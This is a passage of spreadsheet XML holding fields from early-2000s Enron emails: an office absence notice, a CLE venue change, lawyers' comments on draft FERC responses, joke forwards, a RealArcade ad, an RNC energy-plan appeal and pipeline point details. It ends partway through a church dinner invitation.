    <t>frozenset({'pinto.leite@enron.com', 'keegan.farrell@enron.com', 'brent.hendry@enron.com', 'susan.bailey@enron.com', 'becky.spencer@enron.com', 'kayla.heitmeyer@enron.com', 'stephanie.panus@enron.com', 'esmeralda.gonzalez@enron.com', 'mark.greenberg@enron.com', 'legal &lt;.taylor@enron.com&gt;', 'sara.shackleton@enron.com', 'nita.garcia@enron.com', 'frank.sayre@enron.com', 'marie.heard@enron.com', 'c..koehler@enron.com', 'tana.jones@enron.com', 'holly.keiser@enron.com', 'robert.bruce@enron.com', 'samantha.boyd@enron.com', 'cheryl.nelson@enron.com', 'mary.cook@enron.com'})</t>
  </si>
  <si>
    <t>Cheryl left me a voicemail this morning detailing that she will not be in until around 10am this morning.  Please feel free to contact me should you need any assistance.  Thank you and have a pleasant morning._x000D_
_x000D_
Keegan Farrell_x000D_
EB3875_x000D_
713-345-3317</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 07:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>mdea</t>
  </si>
  <si>
    <t xml:space="preserve">Here's where I am.  I haven't finished all of your changes.  Please look for _x000D_
bold stuff, that's where I have questions.  If no question is given, I'm _x000D_
looking for your confirmation._x000D_
</t>
  </si>
  <si>
    <t>Wed, 11 Oct 2000 03:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>CLE Presentation</t>
  </si>
  <si>
    <t>I think you need this._x000D_
_x000D_
_x000D_
----- Forwarded by Gerald Nemec/HOU/ECT on 10/11/2000 10:59 AM -----_x000D_
_x000D_
	Robin Jordan@ENRON COMMUNICATIONS_x000D_
	10/11/2000 10:42 AM_x000D_
		 _x000D_
		 To: James Derrick/Corp/Enron@ENRON, Rob Walls/NA/Enron@ENRON, Rex _x000D_
Rogers/Corp/Enron@ENRON, Clement Abrams/Corp/Enron@Enron, Jim _x000D_
Armogida/Corp/Enron@ENRON, Ann Ballard/Corp/Enron@ENRON, Sharon _x000D_
Butcher/Corp/Enron@ENRON, Robert Eickenroht/Corp/Enron@ENRON, Kelly Noel _x000D_
Higgason/Corp/Enron@ENRON, Mark Holsworth/Corp/Enron@ENRON, Kriste _x000D_
Sullivan/Corp/Enron@Enron, Scott Sefton/HOU/ECT@ECT, Gareth _x000D_
Bahlmann/HOU/ECT@ECT, Julia H Chin/NA/Enron@Enron, Nora _x000D_
Dobin/Corp/Enron@Enron, Roseann Engeldorf/Corp/Enron@Enron, Joel _x000D_
Ephross/Corp/Enron@Enron, Michael Moran/ET&amp;S/Enron@Enron, Philip _x000D_
Crowley/ET&amp;S/Enron@ENRON, Staci Holtzman/FGT/Enron@ENRON, Lee _x000D_
Huber/ET&amp;S/Enron@Enron, Frazier King/FGT/Enron@Enron, Tony _x000D_
Pryor/ET&amp;S/Enron@ENRON, Colleen Raker/ET&amp;S/Enron@Enron, Bret _x000D_
Reich/ET&amp;S/Enron@Enron, Susan M Scott/HOU/ECT@ECT, Louis _x000D_
Soldano/ET&amp;S/Enron@ENRON, Kim Wilkie/ET&amp;S/Enron@Enron, Charles _x000D_
Cheek/Corp/Enron@ENRON, Britt Davis/Corp/Enron@Enron, David _x000D_
Grant/Corp/Enron@Enron, Eileen Kisluk/Corp/Enron@ENRON, Robert _x000D_
Vote/Corp/Enron@ENRON, Bonnie White/Corp/Enron@Enron, Bill _x000D_
Bowes/NA/Enron@Enron, Donette Dewar/HOU/ECT@ECT, Annette _x000D_
Glod/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Alicia Goodrow/Corp/Enron@Enron, _x000D_
Robert Hermann/Corp/Enron@ENRON, Tony Jarrett/Corp/Enron@ENRON, Alberto _x000D_
Jimenez/Corp/Enron@ENRON, Tina Livingston/HOU/ECT@ECT, Margaret _x000D_
Maddox/NA/Enron@ENRON, Davis Maxey/Corp/Enron@ENRON, Dub _x000D_
Morris/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Tara Rafter/Corp/Enron@Enron, _x000D_
AnnMarie Tiller/Corp/Enron@ENRON, Brent Vasconcellos/Corp/Enron@Enron, Robert _x000D_
Ward/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Leesa White/HOU/ECT@ECT, Shelley _x000D_
Corman/ET&amp;S/Enron@ENRON, Robert Frank/NA/Enron@Enron, Jan _x000D_
Johnson/GPGFIN/Enron@Enron, Steven J Kean/NA/Enron@ENRON, Lara Leibman/Enron _x000D_
Communications@Enron Communications, J Mark Metts/NA/Enron@Enron@ECT, Christi _x000D_
L Nicolay/HOU/ECT@ECT, Gloria Ogenyi/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Christie Patrick/HOU/ECT@ECT, Brian Schaffer/Corp/Enron@Enron, Richard _x000D_
Shapiro/NA/Enron@ENRON, Thane Twiggs/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
John Ale/HOU/AZURIX@AZURIX, Allan Conge/HOU/AZURIX@AZURIX, Elisa _x000D_
Donovan/HOU/EES@EES, Tim Dorsey/HOU/AZURIX@AZURIX, Greer _x000D_
Mendelow/HOU/AZURIX@AZURIX, Trey Cash/Corp/Enron@ENRON, Bruce _x000D_
Lundstrom/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Yao _x000D_
Apasu/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, William _x000D_
Krenz/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Bonnie _x000D_
Nelson/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Gerard Willis/NA/Enron@ENRON, _x000D_
Susan Musch/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, James A _x000D_
Hughes/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Sean _x000D_
Long/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Kristina Mordaunt/Enron _x000D_
Communications@Enron Communications, Cynthia Harkness/Enron _x000D_
Communications@Enron Communications, Michelle Hicks/Enron _x000D_
Communications@Enron Communications, Gil Melman/Enron Communications@Enron _x000D_
Communications, Robbi Rossi/Enron Communications@Enron Communications, David _x000D_
Koogler/Enron Communications@Enron Communications, Wayne Gardner/Enron _x000D_
Communications@Enron Communications, Richard DiMichele/Enron _x000D_
Communications@Enron Communications, Tod A Lindholm/NA/Enron@ENRON, Frank _x000D_
Sayre/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Ned E _x000D_
Crady/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Miguel _x000D_
Mendoza/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Francisco Pinto _x000D_
Leite/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Coralina _x000D_
Rivera/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Carlos Ryerson/ENRON_DEVELOPMENT, _x000D_
Keith Gercken/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Victor _x000D_
Nieto/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Beth _x000D_
Wapner/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Kim Monk/Enron _x000D_
Communications@Enron Communications, Vicki Sharp/HOU/EES@EES, Deborah _x000D_
Asmus/HOU/EES@EES, Marianne Castano/HOU/EES@EES, Deborah Culver/HOU/EES@EES, _x000D_
Luis Derrota/HOU/EES@EES, Edwin Essandoh/HOU/EES@EES, Richard _x000D_
Freed/HOU/EES@EES, Patrick G Grant/HOU/EES@EES, James E Keller/HOU/EES@EES, _x000D_
Michelle Maynard/HOU/EES@EES, Bill Rapp/HOU/EES@EES, Andrew _x000D_
Ralston/HOU/EES@EES, David Roland/HOU/EES@EES, Ronald Adzgery/HOU/EES@EES, _x000D_
Jeffrey K Fischer/HOU/EES@EES, Robert D Gresch/HOU/EES@EES, John _x000D_
Schwartzenburg/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, David K _x000D_
Bargainer/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Scott _x000D_
Dieball/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Randy Pais/Corp/Enron@Enron, _x000D_
Carlos Sole/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Reynaldo _x000D_
Garcia/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Carmen _x000D_
Pokluda/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Stephen _x000D_
Wallace/Corp/Enron@ENRON, Mark Antonvich/NA/Enron@ENRON, Dominic _x000D_
Carolan/NA/Enron@ENRON, Monica Jordan Richards/HOU/ECT@ECT, Jack _x000D_
Harmuth/Corp/Enron@ENRON, Michael J Smalling/HOU/ECT@ECT, Phil _x000D_
Patman/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Daniel R _x000D_
Rogers/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Nancy _x000D_
Corbet/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Mark E Haedicke/HOU/ECT@ECT, Alan _x000D_
Aronowitz/HOU/ECT@ECT, Roger Balog/HOU/ECT@ECT, Peggy Banczak/HOU/ECT@ECT, _x000D_
Robert Bruce/NA/Enron@ENRON, Teresa G Bushman/HOU/ECT@ECT, Bob _x000D_
Carter/HOU/ECT@ECT, Michelle Cash/HOU/ECT@ECT, Barton Clark/HOU/ECT@ECT, _x000D_
Harry M Collins/HOU/ECT@ECT, Mary Cook/HOU/ECT@ECT, Shonnie _x000D_
Daniel/HOU/ECT@ECT, Angela Davis/NA/Enron@Enron, Peter del _x000D_
Vecchio/HOU/ECT@ECT, Stacy E Dickson/HOU/ECT@ECT, Shawna Flynn/HOU/ECT@ECT, _x000D_
Robert H George/NA/Enron@ENRON, James Grace/Corp/Enron@ENRON, Wayne _x000D_
Gresham/HOU/ECT@ECT, Barbara N Gray/HOU/ECT@ECT, Mark _x000D_
Greenberg/NA/Enron@Enron, Brent Hendry/NA/Enron@ENRON, Jeffrey T _x000D_
Hodge/HOU/ECT@ECT, Dan J Hyvl/HOU/ECT@ECT, Anne C Koehler/HOU/ECT@ECT, Dan _x000D_
Lyons/HOU/ECT@ECT, Kay Mann/Corp/Enron@ENRON, Travis McCullough/HOU/ECT@ECT, _x000D_
Lisa Mellencamp/HOU/ECT@ECT, Janet H Moore/HOU/ECT@ECT, Janice R _x000D_
Moore/HOU/ECT@ECT, Julia Murray/HOU/ECT@ECT, Gerald Nemec/HOU/ECT@ECT, Martin _x000D_
Penkwitz/HOU/EES@EES, David Portz/HOU/ECT@ECT, Michael A Robison/HOU/ECT@ECT, _x000D_
Elizabeth Sager/HOU/ECT@ECT, Richard B Sanders/HOU/ECT@ECT, Lance _x000D_
Schuler-Legal/HOU/ECT@ECT, Sara Shackleton/HOU/ECT@ECT, Shari _x000D_
Stack/HOU/ECT@ECT, Lou Stoler/HOU/ECT@ECT, Carol St Clair/HOU/ECT@ECT, Mark _x000D_
Taylor/HOU/ECT@ECT, Sheila Tweed/HOU/ECT@ECT, Steve Van Hooser/HOU/ECT@ECT, _x000D_
John Viverito/Corp/Enron@ENRON, Ann Elizabeth White/HOU/ECT@ECT, Christian _x000D_
Yoder/HOU/ECT@ECT, Stuart Zisman/HOU/ECT@ECT, Jeff Blumenthal/HOU/ECT@ECT, _x000D_
Morris Richard Clark/HOU/ECT@ECT, Stephen H Douglas/HOU/ECT@ECT, Marcus _x000D_
Nettelton/NA/Enron@ENRON, Matthew F Gockerman/HOU/ECT@ECT, Jeff _x000D_
Herrold/Corp/Enron@ENRON, Rockford Meyer/FGT/Enron@ENRON, Tom _x000D_
Shelton/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: CLE Presentation_x000D_
_x000D_
 The location for the continuing education presentation "Guide to Principles _x000D_
of the Attorney-Client and Work Product Privileges" has changed from the _x000D_
Forum at 3 Allen Center to the Hyatt Regency Ballroom from 10:00 a.m. - 11:00 _x000D_
a.m. Thursday, October 12th. _x000D_
_x000D_
  If you plan to attend and have not responded, please call me or email me at _x000D_
your earliest convenience.  Space is still available.  Participants will _x000D_
receive one hour of ethics CLE._x000D_
_x000D_
_x000D_
_x000D_
Robin Jordan_x000D_
Enron Broadband Services_x000D_
(713) 853-3246_x000D_
(713) 646-8537 Fax_x000D_
robin_jordan@enron.net</t>
  </si>
  <si>
    <t>Fri, 7 Jan 2000 00:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>cultural notes</t>
  </si>
  <si>
    <t xml:space="preserve">The Mark Morris group performance is the last weekend of this month, the 27th _x000D_
- 29th.  See the website www.spahouston.org and click on "Program Notes" for _x000D_
a detailed description.  _x000D_
_x000D_
Bill and I will leave for Austin tomorrow a.m. as early as we can manage.  _x000D_
I'm not picky about where we go for dinner, but was thinking Bill might enjoy _x000D_
going to the Bitter End brew pub -- I'm sure they don't take reservations but _x000D_
it should not be a problem if we go early enough.  _x000D_
_x000D_
The landscaper removed all the bushes in the front beds and it looks weird!  _x000D_
Can't wait for her to get the new gravel in my driveway._x000D_
_x000D_
We'll call tomorrow a.m. if not sooner!  Have a good day!  </t>
  </si>
  <si>
    <t>Fri, 1 Dec 2000 00:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: FW: Draft Responses to Chairman Hoecker's Questions</t>
  </si>
  <si>
    <t xml:space="preserve">I have reviewed the response and I agree with the "home run" approach. I want _x000D_
to make sure that you and Robin are completely comfortable with this document _x000D_
since we may see it again._x000D_
_x000D_
_x000D_
_x000D_
	"Fergus, Gary S." &lt;GFergus@brobeck.com&gt;_x000D_
	11/30/2000 10:27 PM_x000D_
		 _x000D_
		 To: "Richard B. Sanders Esq. (E-mail)" &lt;richard.b.sanders@enron.com&gt;, _x000D_
"'sbishop@gibbs-bruns.com'" &lt;sbishop@gibbs-bruns.com&gt;_x000D_
		 cc: "Michael Day (E-mail)" &lt;mday@gmssr.com&gt;_x000D_
		 Subject: FW: Draft Responses to Chairman Hoecker's Questions_x000D_
_x000D_
_x000D_
FYI._x000D_
Here is the last draft of the responses to FERC's questions.  It is still_x000D_
missing a section in response to Question 2 that Mary is drafting.  I_x000D_
believe that Ron has minimized the concerns that I had from the prior draft._x000D_
He is also swinging for a preemption home run ball in the San Diego_x000D_
litigation.  In response to Question No. 4, he is asking FERC to_x000D_
specifically to find that it is preempting investigations of last summers_x000D_
market, find that the rates charged were just and reasonable and determine_x000D_
that sellers are immune from refund under any possible legal theory._x000D_
Anything less will chill the market for further investment and exacerbate_x000D_
the problem.  There is some risk if we ask for this finding and do not get_x000D_
it, that fact will diminish arguments we might have in state or federal_x000D_
court that there has been preemption.  As a practical matter, however, our_x000D_
preliminary research has shown that without a very specific intent to_x000D_
preempt anti-trust laws, for example, the preemption argument may be_x000D_
difficult to make anyway.  Ron and Mary clearly believe this is the one_x000D_
chance we have to get FERC to make a finding.  If FERC does make the_x000D_
finding, it will undoubtedly be appealed.  I do not know how to assess the_x000D_
likelihood that FERC will make the requested finding, and if they do whether_x000D_
it will be upheld on appeal so it is difficult for me to do a risk benefit_x000D_
analysis._x000D_
_x000D_
 If we are going to go this route, I would take out the conditional_x000D_
phrase on page 7 in the word version that reads:  "if they were not in_x000D_
violation of market rules established under the ISO's and PX's tariffs."_x000D_
_x000D_
 Talk to you tomorrow._x000D_
_x000D_
Thanks_x000D_
Gary_x000D_
_x000D_
-----Original Message-----_x000D_
From: Nancy Pickover [mailto:npickover@bracepatt.com]_x000D_
Sent: Thursday, November 30, 2000 4:26 PM_x000D_
To: Jeffrey Watkiss; gfergus@brobeck.com; acomnes@enron.com;_x000D_
jhartso@enron.com; jsteffe@enron.com; mary.hain@enron.com;_x000D_
smara@enron.com_x000D_
Subject: Draft Responses to Chairman Hoecker's Questions_x000D_
_x000D_
_x000D_
As you will see, the attached draft incorporates Sue's and Mary's drafts as_x000D_
well as additional text from me.  The comments filed on Nov. 22 are_x000D_
literally one foot high. If the Commission is serious about getting an order_x000D_
out by mid-December, it is thus highly unlikely that it will carefully_x000D_
review any of the Comments other than the major players (CPUC, Gov. Davis,_x000D_
the UDCs).  I do believe, however, that Chairman Hoecker, the Commissioners_x000D_
and the high level Staffers will be more likely to review the responses to_x000D_
Hoecker's questions.  Thus, if we are to have any realistic hope that they_x000D_
will focus on our arguments, I thought it advisable to use these responses_x000D_
as an advocacy piece rather than a mere discovery response.  Hence, I_x000D_
suggest a lengthy rather than minimalist response._x000D_
_x000D_
I thought that Gary's concern in an earlier email about Alan's rebuttal to_x000D_
the J&amp;K piece was well taken.  I have thus taken out all references to a_x000D_
need to do more analysis on the market abuse issue, and recast his write-up_x000D_
as simply a rebuttal of the J&amp;K Study._x000D_
_x000D_
Finally, the draft (which I have included in Word and WP formats/ the WP_x000D_
format may paginate more accurately) is no doubt in need of wordsmithing;_x000D_
any suggestions would be well appreciated._x000D_
_x000D_
I would like to file this tomorrow, so please call or email me as early in_x000D_
the morning as possible.  (I am not sending this email from my computer, so_x000D_
please create a new email to me when you respond rather than simply hit the_x000D_
"reply" button to this email.)  Talk to you tomorrow (Friday)._x000D_
_x000D_
Ron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0134802.01_x000D_
 - 0134839.01_x000D_
</t>
  </si>
  <si>
    <t>Wed, 19 Jan 2000 09:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mccarthy@bigwords.com'})</t>
  </si>
  <si>
    <t>Kramerica Resources Industries International Development_x000D_
 Corporation Partnership Inc. and Sons</t>
  </si>
  <si>
    <t>Kramer,_x000D_
_x000D_
How are things going? We are thinking of coming to SF on a golf / party trip _x000D_
sometime in the  next few months._x000D_
_x000D_
Things in Calgary are relatively unchanged. No chicks. Work is going great. _x000D_
Cowan and I are trading Alberta and having a great time. _x000D_
_x000D_
Poker and buying electronics have become the hobbies of choice around here. I _x000D_
am terrible at poker but good at buying electronics._x000D_
_x000D_
Take it easy and w/b,_x000D_
_x000D_
Dorland</t>
  </si>
  <si>
    <t>Mon, 18 Dec 2000 00:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'susan.scott@enron.com', 'luchas.johnson@enron.com', 'kori.loibl@enron.com', 'amy.cavazos@enron.com', 'sherry.dawson@enron.com', 'bilal.bajwa@enron.com', 'joey.taylor@enron.com'})</t>
  </si>
  <si>
    <t>NYMEX HOLIDAY SCHEDULE</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Errol McLaughlin/Corp/Enron on 12/18/2000 _x000D_
08:38 AM ---------------------------_x000D_
_x000D_
_x000D_
SOblander@carrfut.com on 12/18/2000 08:26:51 AM_x000D_
To: soblander@carrfut.com_x000D_
cc:  _x000D_
_x000D_
Subject: NYMEX HOLIDAY SCHEDULE_x000D_
_x000D_
_x000D_
Friday, December 22 - Early close at 1PM EST_x000D_
Monday, December 25 - NYMEX Closed_x000D_
Friday, December 29 - Early close at 1 PM EST_x000D_
_x000D_
Have a happy and safe holiday season._x000D_
_x000D_
_x000D_
Carr Futures_x000D_
150 S. Wacker Dr., Suite 1500_x000D_
Chicago, IL 60606  USA_x000D_
Tel:  312-368-6149_x000D_
Fax:  312-368-2281_x000D_
soblander@carrfut.com_x000D_
http://www.carrfut.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 17 Aug 2001 16:36:59 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'hosman@eskridge.net'})</t>
  </si>
  <si>
    <t>[smu-betas] Soooooooo you gots a problem wit my Double wide</t>
  </si>
  <si>
    <t>_x000D_
More Okie Betas_x000D_
[IMAGE][IMAGE]Here I am 50 years old and what have I done with my life?  We=_x000D_
ll I do have the Double-Wide , and the little lady Patsy Joe Dale Bob.  And=_x000D_
 the illegitimate children. Caroline JoeDale Bob on who I spent all my alum=_x000D_
inum can money , sending her to Boston College, &amp; Holly JoeDale Bob who wil=_x000D_
l use up the winnings from the chicken fights sending her to college in Sou=_x000D_
th Carolina, then there is little Tommy Joe Dale Bob who takes after me; he=_x000D_
 gets the Double wide when I'm gone, and special  Janie Jane Jane Joe Dale =_x000D_
Bob our baby who works down at the A&amp;W to support our propane usage.   But =_x000D_
surely there is more to Life.  Had I not consumed all those free beers at G=_x000D_
ordos I would have had more of those brain cells and I too could have been =_x000D_
as successful as the Betas that followed me. I feel so inadequate when I am=_x000D_
 invariably compared to the likes of Strobes,  Dent, Rocky, and you know th=_x000D_
ere's Drow plus that most successful Clay Coburn.  I will feel like the imp=_x000D_
udent Senior Citizen I am when Johnny Miller pulls up the Internet link to =_x000D_
his front-page success article and the others in the class of the class of =_x000D_
75.  I can only hope Beek, my little brother Bless his heart, will send me =_x000D_
a Good pornographic joke._x000D_
=20_x000D_
AND Gall Darn It I forgot two other OKIE Betas  Thems Robert Margo , Joe Pa=_x000D_
rks and Paul Porter._x000D_
Yahoo! Groups Sponsor=09_x000D_
 ADVERTISEMENT [IMAGE] =09_x000D_
[IMAGE]=09_x000D_
_x000D_
 To unsubscribe from this group, send an email to:_x000D_
smu-betas-unsubscribe@egroups.com_x000D_
=20_x000D_
Your use of Yahoo! Groups is subject to the Yahoo! Terms of Service.=20_x000D_
_x000D_
 - image001.jpg</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 03:08:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jarnold@ei.enron.com'})</t>
  </si>
  <si>
    <t>Put the fun back on your desktop - FREE!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Unsubscribe at  bottom[IMAGE]	_x000D_
 [IMAGE]  [IMAGE]       Click  here to download RealArcade.    [IMAGE] [IMAGE]  Experience  the Internet's first personal game arcade!    [IMAGE]     Discover  the best games in every category and genre    [IMAGE]     Acquire  games easily and reliably    [IMAGE]       Play  games with greater ease and knowledge  [IMAGE]       Click  here to download RealArcade.    	_x000D_
 remove  me                    privacy  policy       You are receiving this e-mail because you  downloaded RealPlayer(R) or RealJukebox(R) from Real.com(TM) and indicated  a preference to receive product news, updates, and special offers from  RealNetworks(R). If you do not wish to receive e-mails from us in the  future, click on the "remove me" link above.    RealPlayer(R), RealJukebox(R), Real.com(TM),  RealArcade(TM) and RealNetworks(R) are trademarks or registered trademarks  of RealNetworks, Inc. All other companies or products listed herein  are trademarks or registered trademarks of their respective owners.  	_x000D_
</t>
  </si>
  <si>
    <t>Mon, 14 Feb 2000 01:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bryan.hull@enron.com', 'daren.farmer@enron.com', 'phillip.love@enron.com', "o'neal.winfree@enron.com", 'michael.walters@enron.com', 'eric.bass@enron.com'})</t>
  </si>
  <si>
    <t>VALENTINES DAY HELP</t>
  </si>
  <si>
    <t xml:space="preserve">RED-NECK VALENTINE'S LOVE POEM_x000D_
_x000D_
Collards is green_x000D_
my dog's name is Blue_x000D_
and I'm so lucky_x000D_
to have a sweet thang like you._x000D_
_x000D_
Yore hair is like cornsilk_x000D_
a-flapping in the breeze_x000D_
Softer than  OLD Blue's_x000D_
and without all them fleas._x000D_
_x000D_
You move like the bass,_x000D_
which excite me in May._x000D_
You ain't got no scales_x000D_
but I luv you anyway._x000D_
_x000D_
Yo're as satisfy'n as okry_x000D_
jist a-fry'n in the pan._x000D_
Yo're as fragrant as "snuff"_x000D_
right out of the can._x000D_
_x000D_
You have som'a yore teeth,_x000D_
for which I am proud;_x000D_
I hold my head high_x000D_
when we're in a crowd._x000D_
_x000D_
On special occasions,_x000D_
when you shave under yore arms,_x000D_
well, I'm in hawg heaven,_x000D_
and awed by yore charms._x000D_
_x000D_
Still them fellers at work,_x000D_
they all want to know,_x000D_
what I did to deserve_x000D_
such a purdy, young doe._x000D_
_x000D_
Like a good roll of duct tape_x000D_
yo're there fer yore man,_x000D_
to patch up life's troubles_x000D_
and fix what you can._x000D_
_x000D_
Yo're as cute as a junebug_x000D_
a-buzzin' overhead._x000D_
You ain't mean like those far ants_x000D_
I found in my bed._x000D_
_x000D_
Cut from the best cloth_x000D_
like a plaid flannel shirt,_x000D_
you spark up my life_x000D_
more than a fresh load of dirt._x000D_
_x000D_
When you hold me real tight_x000D_
like a padded gunrack,_x000D_
my life is complete;_x000D_
Ain't nuttin' I lack._x000D_
_x000D_
Yore complexion, it's perfection,_x000D_
like the best vinyl sidin'._x000D_
despite all the years,_x000D_
yore age, it keeps hidin'._x000D_
_x000D_
Me 'n' you's  we go together_x000D_
 just like a Moon Pie_x000D_
with a RC cold drank,_x000D_
_x000D_
yep, we go together_x000D_
like a skunk goes with stank._x000D_
_x000D_
Some men, they buy chocolate_x000D_
for Valentine's Day;_x000D_
They git it at Wal-Mart,_x000D_
it's romantic that way._x000D_
_x000D_
Some men git roses_x000D_
on that special day_x000D_
from the cooler at Kroger._x000D_
"That's impressive," I say._x000D_
_x000D_
Some men buy fine diamonds_x000D_
from a flea market booth._x000D_
"Diamonds are forever,"_x000D_
they explain, suave and couth._x000D_
_x000D_
But for this man, honey,_x000D_
these won't do._x000D_
_x000D_
Cause yo're too special,_x000D_
you sweet thang you._x000D_
_x000D_
I got you a gift,_x000D_
without taste nor odor,_x000D_
more useful than diamonds..._x000D_
_x000D_
IT'S A NEW TROLLIN' MOTOR!!_x000D_
_x000D_
l shore due luv you darling,_x000D_
_x000D_
AINT LOVE GRAND!!!!....._x000D_
_x000D_
BUBBA_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 13:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'karen.brostad@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'beverly.miller@enron.com', 'perry.frazier@enron.com', 'tk.lohman@enron.com', 'lorraine.lindberg@enron.com', 'bert.hernandez@enron.com', 'kevin.hyatt@enron.com', 'tracy.minter@enron.com', 'john.buchanan@enron.com', 'mary.draemer@enron.com', 'amy.mulligan@enron.com', 'gale.ramsaran@enron.com', 'linda.ward@enron.com', 'patricia.steele@enron.com', 'elizabeth.brown@enron.com', 'michelle.lokay@enron.com', 'christine.mcevoy@enron.com', 'darrell.schoolcraft@enron.com', 'terry.kowalke@enron.com', 'linda.trevino@enron.com', 'dennis.lee@enron.com'})</t>
  </si>
  <si>
    <t>New PNR points for Transwestern</t>
  </si>
  <si>
    <t xml:space="preserve">The following two new PNR points have been established for Transwestern per marketing's request._x000D_
_x000D_
DRN numbers have been requested._x000D_
_x000D_
Dennis, please add these to the PNR templates._x000D_
_x000D_
POI		78293_x000D_
POI Name	PNR NNG/TW Gray_x000D_
Loc		I&amp;GN Survey, Blk 33, sec 148, Gray Co, TX_x000D_
_x000D_
_x000D_
POI		78294_x000D_
POI Name	PNR NNG/TW Halley_x000D_
Loc		G&amp;MMB&amp;A Survey, Blk F, RR SEc 31, Winkler Co, TX_x000D_
_x000D_
_x000D_
Karen_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 17 May 2001 18:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'eleader@mail.echampions2000.com'})</t>
  </si>
  <si>
    <t>frozenset({'gwhalle@ect.enron.com'})</t>
  </si>
  <si>
    <t>www.BushEnergy.com</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Friend:_x000D_
_x000D_
America has a serious energy shortage and President Bush has a comprehensive _x000D_
plan to address it.  Please follow this link to read the President's _x000D_
comprehensive energy plan as well as to view the speech he delivered _x000D_
yesterday in St. Paul, Minnesota: http://www.BushEnergy.com._x000D_
_x000D_
The President's plan to produce more reliable, affordable and environmentally _x000D_
clean energy is built on three core principles:_x000D_
_x000D_
--The plan is comprehensive and forward looking._x000D_
_x000D_
--It uses 21st century technology to allow us to promote conservation and _x000D_
diversify our energy supply._x000D_
_x000D_
--The plan will increase the quality of life of Americans by providing _x000D_
reliable energy and protecting the environment._x000D_
_x000D_
While President Bush is showing strong leadership on a long neglected _x000D_
problem, some want to protect the status quo of higher prices, less supply _x000D_
and more neglect.  WE NEED YOU TO HELP PRESIDENT BUSH'S PLAN BY:_x000D_
_x000D_
1. Writing a letter to the editor about the President's comprehensive energy _x000D_
plan.  Go to http://www.BushEnergy.com for sample letters and your _x000D_
newspaper's address._x000D_
_x000D_
2. Calling talk radio in your area to discuss the President's leadership on _x000D_
the energy issue.  Visit http://www.BushEnergy.com for contact numbers._x000D_
_x000D_
3. Forwarding this message to five friends_x000D_
_x000D_
4. Call your Congressman and Senators to urge them to support the President's _x000D_
plan.  For contact numbers, go to http://www.BushEnergy.com._x000D_
_x000D_
You can also help Republican National Committee efforts to pass the _x000D_
President's comprehensive energy plan.  Please make an online contribution _x000D_
today by using this secure link: _x000D_
https://www.econtributor.net/Contribution/Contribution.cfm?AID=ITYPOWNPZHII_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Governor Jim Gilmore_x000D_
Chairman, Republican National Committee_x000D_
_x000D_
--------------_x000D_
Contributions or gifts to the Republican National Committee are not _x000D_
deductible as charitable contributions for federal income tax purposes._x000D_
_x000D_
Paid for by the Republican National Committee._x000D_
_x000D_
If you wish to unsubscribe from the eChampion mailing list, simply click here:_x000D_
_x000D_
http://mail.echampions2000.com/GoNow/a14064a35129a56615396a0_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 5 May 2000 07:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'uhenning@foxboro.com'})</t>
  </si>
  <si>
    <t>Church Gourmet</t>
  </si>
  <si>
    <t>Attached are the recipes for the Church Gourmet Dinner.  I've got you down _x000D_
tor the pork chops (Alicia says  to make it a mix of pork and chicken).  All _x000D_
the recipes looked really good, so I thought you might want to look at them _x000D_
anyway._x000D_
_x000D_
The directions to my house are as follows:_x000D_
_x000D_
1.  Take 59 and exit Greenbriar like you are going to Church_x000D_
2.  First light is Bissonnet, make a left on Bissonnet._x000D_
